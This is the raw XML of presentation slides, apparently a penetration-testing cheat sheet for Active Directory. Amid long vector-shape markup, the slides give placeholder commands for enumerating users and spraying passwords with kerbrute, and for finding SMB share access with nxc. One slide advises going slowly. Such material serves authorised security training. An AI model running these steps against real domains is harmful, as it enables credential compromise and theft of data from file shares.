                <a:gd name="connsiteX5" fmla="*/ 49267 w 904393"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 98533"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 904393"/>
                <a:gd name="connsiteY6" fmla="*/ 49267 h 9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393" h="98533">
                  <a:moveTo>
                    <a:pt x="0" y="49267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="76477"/>
                    <a:pt x="22057" y="98534"/>
                    <a:pt x="49267" y="98534"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="855126" y="98534"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="882336" y="98534"/>
                    <a:pt x="904393" y="76477"/>
                    <a:pt x="904393" y="49267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="904393" y="22057"/>
                    <a:pt x="882336" y="0"/>
                    <a:pt x="855126" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49267" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22057" y="0"/>
                    <a:pt x="0" y="22057"/>
                    <a:pt x="0" y="49267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BD7257-3C58-FD22-977B-022B18A2D6B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2911232" y="2338363"/>
              <a:ext cx="143317" cy="98533"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 143317"/>
                <a:gd name="connsiteY0" fmla="*/ 49267 h 98533"/>
                <a:gd name="connsiteX1" fmla="*/ 49267 w 143317"/>
                <a:gd name="connsiteY1" fmla="*/ 98534 h 98533"/>
                <a:gd name="connsiteX2" fmla="*/ 94051 w 143317"/>
                <a:gd name="connsiteY2" fmla="*/ 98534 h 98533"/>
                <a:gd name="connsiteX3" fmla="*/ 143318 w 143317"/>
                <a:gd name="connsiteY3" fmla="*/ 49267 h 98533"/>
                <a:gd name="connsiteX4" fmla="*/ 94051 w 143317"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 98533"/>
                <a:gd name="connsiteX5" fmla="*/ 49267 w 143317"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 98533"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 143317"/>
                <a:gd name="connsiteY6" fmla="*/ 49267 h 9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317" h="98533">
                  <a:moveTo>
                    <a:pt x="0" y="49267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="76477"/>
                    <a:pt x="22057" y="98534"/>
                    <a:pt x="49267" y="98534"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94051" y="98534"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="121261" y="98534"/>
                    <a:pt x="143318" y="76477"/>
                    <a:pt x="143318" y="49267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143318" y="22057"/>
                    <a:pt x="121261" y="0"/>
                    <a:pt x="94051" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49267" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22057" y="0"/>
                    <a:pt x="0" y="22057"/>
                    <a:pt x="0" y="49267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11D6BC8-E954-17EB-16DE-8F6D84ADAD15}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1491066" y="2472618"/>
              <a:ext cx="833856" cy="428685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 29114 w 833856"/>
                <a:gd name="connsiteY0" fmla="*/ 94245 h 428685"/>
                <a:gd name="connsiteX1" fmla="*/ 764324 w 833856"/>
                <a:gd name="connsiteY1" fmla="*/ 424334 h 428685"/>
                <a:gd name="connsiteX2" fmla="*/ 829505 w 833856"/>
                <a:gd name="connsiteY2" fmla="*/ 399602 h 428685"/>
                <a:gd name="connsiteX3" fmla="*/ 804773 w 833856"/>
                <a:gd name="connsiteY3" fmla="*/ 334421 h 428685"/>
                <a:gd name="connsiteX4" fmla="*/ 69464 w 833856"/>
                <a:gd name="connsiteY4" fmla="*/ 4333 h 428685"/>
                <a:gd name="connsiteX5" fmla="*/ 4333 w 833856"/>
                <a:gd name="connsiteY5" fmla="*/ 29114 h 428685"/>
                <a:gd name="connsiteX6" fmla="*/ 29114 w 833856"/>
                <a:gd name="connsiteY6" fmla="*/ 94245 h 42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856" h="428685">
                  <a:moveTo>
                    <a:pt x="29114" y="94245"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="764324" y="424334"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="789155" y="435502"/>
                    <a:pt x="818336" y="424432"/>
                    <a:pt x="829505" y="399602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="840674" y="374771"/>
                    <a:pt x="829603" y="345590"/>
                    <a:pt x="804773" y="334421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69464" y="4333"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44633" y="-6811"/>
                    <a:pt x="15477" y="4283"/>
                    <a:pt x="4333" y="29114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-6811" y="53945"/>
                    <a:pt x="4283" y="83101"/>
                    <a:pt x="29114" y="94245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DCE68D-A33D-0C61-C363-90CB11210611}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2512515" y="2930969"/>
              <a:ext cx="138735" cy="116715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 69663 w 138735"/>
                <a:gd name="connsiteY0" fmla="*/ 112551 h 116715"/>
                <a:gd name="connsiteX1" fmla="*/ 134573 w 138735"/>
                <a:gd name="connsiteY1" fmla="*/ 87228 h 116715"/>
                <a:gd name="connsiteX2" fmla="*/ 109964 w 138735"/>
                <a:gd name="connsiteY2" fmla="*/ 22639 h 116715"/>
                <a:gd name="connsiteX3" fmla="*/ 69072 w 138735"/>
                <a:gd name="connsiteY3" fmla="*/ 4164 h 116715"/>
                <a:gd name="connsiteX4" fmla="*/ 4163 w 138735"/>
                <a:gd name="connsiteY4" fmla="*/ 29487 h 116715"/>
                <a:gd name="connsiteX5" fmla="*/ 28772 w 138735"/>
                <a:gd name="connsiteY5" fmla="*/ 94076 h 11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35" h="116715">
                  <a:moveTo>
                    <a:pt x="69663" y="112551"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94578" y="123484"/>
                    <a:pt x="123640" y="112147"/>
                    <a:pt x="134573" y="87228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145382" y="62590"/>
                    <a:pt x="134430" y="33837"/>
                    <a:pt x="109964" y="22639"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69072" y="4164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="44158" y="-6768"/>
                    <a:pt x="15095" y="4568"/>
                    <a:pt x="4163" y="29487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-6646" y="54126"/>
                    <a:pt x="4306" y="82878"/>
                    <a:pt x="28772" y="94076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CAB8687-FDA8-C78E-4B2C-DAFFE3E1E2A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1483159" y="2011531"/>
              <a:ext cx="554937" cy="291896"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 485055 w 554937"/>
                <a:gd name="connsiteY0" fmla="*/ 4527 h 291896"/>
                <a:gd name="connsiteX1" fmla="*/ 31504 w 554937"/>
                <a:gd name="connsiteY1" fmla="*/ 196669 h 291896"/>
                <a:gd name="connsiteX2" fmla="*/ 3333 w 554937"/>
                <a:gd name="connsiteY2" fmla="*/ 260395 h 291896"/>
                <a:gd name="connsiteX3" fmla="*/ 67055 w 554937"/>
                <a:gd name="connsiteY3" fmla="*/ 288566 h 291896"/>
                <a:gd name="connsiteX4" fmla="*/ 69883 w 554937"/>
                <a:gd name="connsiteY4" fmla="*/ 287369 h 291896"/>
                <a:gd name="connsiteX5" fmla="*/ 523434 w 554937"/>
                <a:gd name="connsiteY5" fmla="*/ 95228 h 291896"/>
                <a:gd name="connsiteX6" fmla="*/ 551605 w 554937"/>
                <a:gd name="connsiteY6" fmla="*/ 31501 h 291896"/>
                <a:gd name="connsiteX7" fmla="*/ 487883 w 554937"/>
                <a:gd name="connsiteY7" fmla="*/ 3330 h 291896"/>
                <a:gd name="connsiteX8" fmla="*/ 485055 w 554937"/>
                <a:gd name="connsiteY8" fmla="*/ 4527 h 29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937" h="291896">
                  <a:moveTo>
                    <a:pt x="485055" y="4527"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="31504" y="196669"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6126" y="206487"/>
                    <a:pt x="-6486" y="235018"/>
                    <a:pt x="3333" y="260395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13152" y="285768"/>
                    <a:pt x="41682" y="298380"/>
                    <a:pt x="67055" y="288566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68010" y="288197"/>
                    <a:pt x="68951" y="287798"/>
                    <a:pt x="69883" y="287369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="523434" y="95228"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="548811" y="85409"/>
                    <a:pt x="561424" y="56878"/>
                    <a:pt x="551605" y="31501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541786" y="6129"/>
                    <a:pt x="513255" y="-6484"/>
                    <a:pt x="487883" y="3330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486927" y="3700"/>
                    <a:pt x="485986" y="4099"/>
                    <a:pt x="485055" y="4527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96FF080-CA3A-8009-8A9C-4269192CB0C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2226762" y="1871957"/>
              <a:ext cx="141323" cy="116659"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 49370 w 141323"/>
                <a:gd name="connsiteY0" fmla="*/ 116659 h 116659"/>
                <a:gd name="connsiteX1" fmla="*/ 68584 w 141323"/>
                <a:gd name="connsiteY1" fmla="*/ 112718 h 116659"/>
                <a:gd name="connsiteX2" fmla="*/ 109820 w 141323"/>
                <a:gd name="connsiteY2" fmla="*/ 95228 h 116659"/>
                <a:gd name="connsiteX3" fmla="*/ 137991 w 141323"/>
                <a:gd name="connsiteY3" fmla="*/ 31501 h 116659"/>
                <a:gd name="connsiteX4" fmla="*/ 74264 w 141323"/>
                <a:gd name="connsiteY4" fmla="*/ 3332 h 116659"/>
                <a:gd name="connsiteX5" fmla="*/ 71441 w 141323"/>
                <a:gd name="connsiteY5" fmla="*/ 4528 h 116659"/>
                <a:gd name="connsiteX6" fmla="*/ 30205 w 141323"/>
                <a:gd name="connsiteY6" fmla="*/ 21968 h 116659"/>
                <a:gd name="connsiteX7" fmla="*/ 3857 w 141323"/>
                <a:gd name="connsiteY7" fmla="*/ 86469 h 116659"/>
                <a:gd name="connsiteX8" fmla="*/ 49370 w 141323"/>
                <a:gd name="connsiteY8" fmla="*/ 116659 h 11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23" h="116659">
                  <a:moveTo>
                    <a:pt x="49370" y="116659"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55976" y="116654"/>
                    <a:pt x="62509" y="115314"/>
                    <a:pt x="68584" y="112718"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109820" y="95228"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135198" y="85409"/>
                    <a:pt x="147810" y="56879"/>
                    <a:pt x="137991" y="31501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128172" y="6127"/>
                    <a:pt x="99642" y="-6485"/>
                    <a:pt x="74264" y="3332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73313" y="3702"/>
                    <a:pt x="72372" y="4100"/>
                    <a:pt x="71441" y="4528"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30205" y="21968"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5118" y="32502"/>
                    <a:pt x="-6681" y="61382"/>
                    <a:pt x="3857" y="86469"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11552" y="104791"/>
                    <a:pt x="29500" y="116694"/>
                    <a:pt x="49370" y="116659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02D9C5D-CD29-9AE3-7660-B84C9B2ADF13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2556624" y="1733141"/>
              <a:ext cx="139474" cy="115852"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 49301 w 139474"/>
                <a:gd name="connsiteY0" fmla="*/ 115853 h 115852"/>
                <a:gd name="connsiteX1" fmla="*/ 68466 w 139474"/>
                <a:gd name="connsiteY1" fmla="*/ 111961 h 115852"/>
                <a:gd name="connsiteX2" fmla="*/ 109702 w 139474"/>
                <a:gd name="connsiteY2" fmla="*/ 94520 h 115852"/>
                <a:gd name="connsiteX3" fmla="*/ 135434 w 139474"/>
                <a:gd name="connsiteY3" fmla="*/ 29773 h 115852"/>
                <a:gd name="connsiteX4" fmla="*/ 71323 w 139474"/>
                <a:gd name="connsiteY4" fmla="*/ 3770 h 115852"/>
                <a:gd name="connsiteX5" fmla="*/ 30087 w 139474"/>
                <a:gd name="connsiteY5" fmla="*/ 21211 h 115852"/>
                <a:gd name="connsiteX6" fmla="*/ 3906 w 139474"/>
                <a:gd name="connsiteY6" fmla="*/ 85778 h 115852"/>
                <a:gd name="connsiteX7" fmla="*/ 49301 w 139474"/>
                <a:gd name="connsiteY7" fmla="*/ 115853 h 11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74" h="115852">
                  <a:moveTo>
                    <a:pt x="49301" y="115853"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55883" y="115849"/>
                    <a:pt x="62401" y="114525"/>
                    <a:pt x="68466" y="111961"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109702" y="94520"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="134691" y="83747"/>
                    <a:pt x="146209" y="54759"/>
                    <a:pt x="135434" y="29773"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124768" y="5033"/>
                    <a:pt x="96208" y="-6550"/>
                    <a:pt x="71323" y="3770"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30087" y="21211"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5025" y="31811"/>
                    <a:pt x="-6696" y="60718"/>
                    <a:pt x="3906" y="85778"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11617" y="104015"/>
                    <a:pt x="29501" y="115862"/>
                    <a:pt x="49301" y="115853"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="49213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388151"/>
            <a:ext cx="6451592" cy="5847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OR LOCAL ACCOUNT PLAINTEXT PASSWORDS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82476" y="2124338"/>
            <a:ext cx="6451592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SPRAY FOUND PASSWORDS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5382476" y="3441546"/>
            <a:ext cx="6435350" cy="753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VALIDATE USERS WITH KERBRUTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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kerbrute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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0" err="1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userenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;USERS&gt; -d &lt;DOMAIN&gt; -o &lt;OUTPUT FILE&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5382476" y="4356393"/>
            <a:ext cx="6427229" cy="753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 WITH KERBRUTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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kerbrute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passwordspray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&lt;VALIDATED USERS&gt; &lt;FOUND PASSWORD&gt; -v -d &lt;DOMAIN&gt; -o &lt;OUTPUT FILE&gt;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770503" y="277127"/>
            <a:ext cx="532549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PASSWORD SPRAY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A82188-4265-4D8C-D987-C1CBA64B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8D657-E6F1-1EA8-4FB5-3A2800D1CB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="2657603"/>
            <a:ext cx="6451592" cy="622179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RETRIEVE USER LIST:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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sz="16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&lt;DC IP&gt; -u &lt;USER&gt; -p &lt;PASSWORD&gt; --users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20AD40-1E7F-11B4-2C81-EE249856EFA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382476" y="5451362"/>
            <a:ext cx="6451592" cy="62217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REPEAT FOR EVERY FOUND PASSWORD</a:t>
            </a:r>
          </a:p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GO SLOW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5398718" y="1609116"/>
            <a:ext cx="645159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WITH DOMAIN USER OR LOCAL USER CREDS OR HASHES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5398718" y="2361961"/>
            <a:ext cx="6451592" cy="84569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THIS WHEN YOU HAVE SOME ACCESS BUT CAN’T ELEVATE PRIVILEGES OTHER WAYS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5398718" y="3375724"/>
            <a:ext cx="6427229" cy="845693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FIND SHAREDRIVE ACCESS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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nxc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smb</a:t>
            </a:r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&lt;445 HOSTS&gt; -u &lt;USER&gt; -H or -p &lt;PASSWORD OR HASH&gt; --shares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7126839" y="0"/>
            <a:ext cx="5065161" cy="1139031"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="5065161" cy="11390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-1" y="35114"/>
              <a:ext cx="5065161" cy="107721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EXPAND FOOTPRINT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1BB103-13B1-6ED9-3D93-56B4F3E6ED90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191820" y="277127"/>
            <a:ext cx="590418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SHARED DRIVE MINING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B195A40-BDCB-CCD4-4FE3-2E14085AD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52918" y="5913783"/>
            <a:ext cx="4729626" cy="765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AB2DF2-0D0F-14D7-E9E9-2D5964F4589B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5374355" y="4389487"/>
            <a:ext cx="6451592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LOOK FOR READ/WRITE PRIVILEGES - PRIORITIZE FILE SHARE HOSTS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D26F5-07CD-A12C-1764-C0539D9117A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5374355" y="5146607"/>
            <a:ext cx="6451592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USE SMBCLIENT.PY OR MOUNT FOR MINING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Picture Placeholder 5" descr="Raw Materials outline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SpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93435" y="2251582"/>
            <a:ext cx="4251324" cy="3141684"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4251325 w 4251324"/>
              <a:gd name="connsiteY0" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX1" fmla="*/ 3053666 w 4251324"/>
              <a:gd name="connsiteY1" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX2" fmla="*/ 3152287 w 4251324"/>
              <a:gd name="connsiteY2" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX3" fmla="*/ 3148737 w 4251324"/>
              <a:gd name="connsiteY3" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX4" fmla="*/ 3396061 w 4251324"/>
              <a:gd name="connsiteY4" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX5" fmla="*/ 3974241 w 4251324"/>
              <a:gd name="connsiteY5" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX6" fmla="*/ 4064453 w 4251324"/>
              <a:gd name="connsiteY6" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX7" fmla="*/ 4111171 w 4251324"/>
              <a:gd name="connsiteY7" fmla="*/ 994063 h 3141684"/>
              <a:gd name="connsiteX8" fmla="*/ 4064453 w 4251324"/>
              <a:gd name="connsiteY8" fmla="*/ 947345 h 3141684"/>
              <a:gd name="connsiteX9" fmla="*/ 3854690 w 4251324"/>
              <a:gd name="connsiteY9" fmla="*/ 947345 h 3141684"/>
              <a:gd name="connsiteX10" fmla="*/ 3451328 w 4251324"/>
              <a:gd name="connsiteY10" fmla="*/ 446903 h 3141684"/>
              <a:gd name="connsiteX11" fmla="*/ 3033811 w 4251324"/>
              <a:gd name="connsiteY11" fmla="*/ 446903 h 3141684"/>
              <a:gd name="connsiteX12" fmla="*/ 2619704 w 4251324"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 3141684"/>
              <a:gd name="connsiteX13" fmla="*/ 2142014 w 4251324"/>
              <a:gd name="connsiteY13" fmla="*/ 257743 h 3141684"/>
              <a:gd name="connsiteX14" fmla="*/ 1553135 w 4251324"/>
              <a:gd name="connsiteY14" fmla="*/ 130623 h 3141684"/>
              <a:gd name="connsiteX15" fmla="*/ 1318705 w 4251324"/>
              <a:gd name="connsiteY15" fmla="*/ 446903 h 3141684"/>
              <a:gd name="connsiteX16" fmla="*/ 846855 w 4251324"/>
              <a:gd name="connsiteY16" fmla="*/ 446903 h 3141684"/>
              <a:gd name="connsiteX17" fmla="*/ 443166 w 4251324"/>
              <a:gd name="connsiteY17" fmla="*/ 947345 h 3141684"/>
              <a:gd name="connsiteX18" fmla="*/ 186871 w 4251324"/>
              <a:gd name="connsiteY18" fmla="*/ 947345 h 3141684"/>
              <a:gd name="connsiteX19" fmla="*/ 140154 w 4251324"/>
              <a:gd name="connsiteY19" fmla="*/ 994063 h 3141684"/>
              <a:gd name="connsiteX20" fmla="*/ 186871 w 4251324"/>
              <a:gd name="connsiteY20" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX21" fmla="*/ 275635 w 4251324"/>
              <a:gd name="connsiteY21" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX22" fmla="*/ 855264 w 4251324"/>
              <a:gd name="connsiteY22" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX23" fmla="*/ 1101327 w 4251324"/>
              <a:gd name="connsiteY23" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX24" fmla="*/ 1097870 w 4251324"/>
              <a:gd name="connsiteY24" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX25" fmla="*/ 1196491 w 4251324"/>
              <a:gd name="connsiteY25" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX26" fmla="*/ 0 w 4251324"/>
              <a:gd name="connsiteY26" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX27" fmla="*/ 0 w 4251324"/>
              <a:gd name="connsiteY27" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX28" fmla="*/ 186871 w 4251324"/>
              <a:gd name="connsiteY28" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX29" fmla="*/ 186871 w 4251324"/>
              <a:gd name="connsiteY29" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX30" fmla="*/ 700768 w 4251324"/>
              <a:gd name="connsiteY30" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX31" fmla="*/ 700768 w 4251324"/>
              <a:gd name="connsiteY31" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX32" fmla="*/ 1027793 w 4251324"/>
              <a:gd name="connsiteY32" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX33" fmla="*/ 1027793 w 4251324"/>
              <a:gd name="connsiteY33" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX34" fmla="*/ 1541689 w 4251324"/>
              <a:gd name="connsiteY34" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX35" fmla="*/ 1541689 w 4251324"/>
              <a:gd name="connsiteY35" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX36" fmla="*/ 1868714 w 4251324"/>
              <a:gd name="connsiteY36" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX37" fmla="*/ 1868714 w 4251324"/>
              <a:gd name="connsiteY37" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX38" fmla="*/ 2382611 w 4251324"/>
              <a:gd name="connsiteY38" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX39" fmla="*/ 2382611 w 4251324"/>
              <a:gd name="connsiteY39" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX40" fmla="*/ 2709636 w 4251324"/>
              <a:gd name="connsiteY40" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX41" fmla="*/ 2709636 w 4251324"/>
              <a:gd name="connsiteY41" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX42" fmla="*/ 3223532 w 4251324"/>
              <a:gd name="connsiteY42" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX43" fmla="*/ 3223532 w 4251324"/>
              <a:gd name="connsiteY43" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX44" fmla="*/ 3550557 w 4251324"/>
              <a:gd name="connsiteY44" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX45" fmla="*/ 3550557 w 4251324"/>
              <a:gd name="connsiteY45" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX46" fmla="*/ 4064453 w 4251324"/>
              <a:gd name="connsiteY46" fmla="*/ 3141684 h 3141684"/>
              <a:gd name="connsiteX47" fmla="*/ 4064453 w 4251324"/>
              <a:gd name="connsiteY47" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX48" fmla="*/ 4251325 w 4251324"/>
              <a:gd name="connsiteY48" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX49" fmla="*/ 607332 w 4251324"/>
              <a:gd name="connsiteY49" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX50" fmla="*/ 280307 w 4251324"/>
              <a:gd name="connsiteY50" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX51" fmla="*/ 280307 w 4251324"/>
              <a:gd name="connsiteY51" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX52" fmla="*/ 607332 w 4251324"/>
              <a:gd name="connsiteY52" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX53" fmla="*/ 2825262 w 4251324"/>
              <a:gd name="connsiteY53" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX54" fmla="*/ 2591673 w 4251324"/>
              <a:gd name="connsiteY54" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX55" fmla="*/ 2825262 w 4251324"/>
              <a:gd name="connsiteY55" fmla="*/ 2394198 h 3141684"/>
              <a:gd name="connsiteX56" fmla="*/ 3058852 w 4251324"/>
              <a:gd name="connsiteY56" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX57" fmla="*/ 2825262 w 4251324"/>
              <a:gd name="connsiteY57" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX58" fmla="*/ 891423 w 4251324"/>
              <a:gd name="connsiteY58" fmla="*/ 540339 h 3141684"/>
              <a:gd name="connsiteX59" fmla="*/ 1249749 w 4251324"/>
              <a:gd name="connsiteY59" fmla="*/ 540339 h 3141684"/>
              <a:gd name="connsiteX60" fmla="*/ 1142625 w 4251324"/>
              <a:gd name="connsiteY60" fmla="*/ 685678 h 3141684"/>
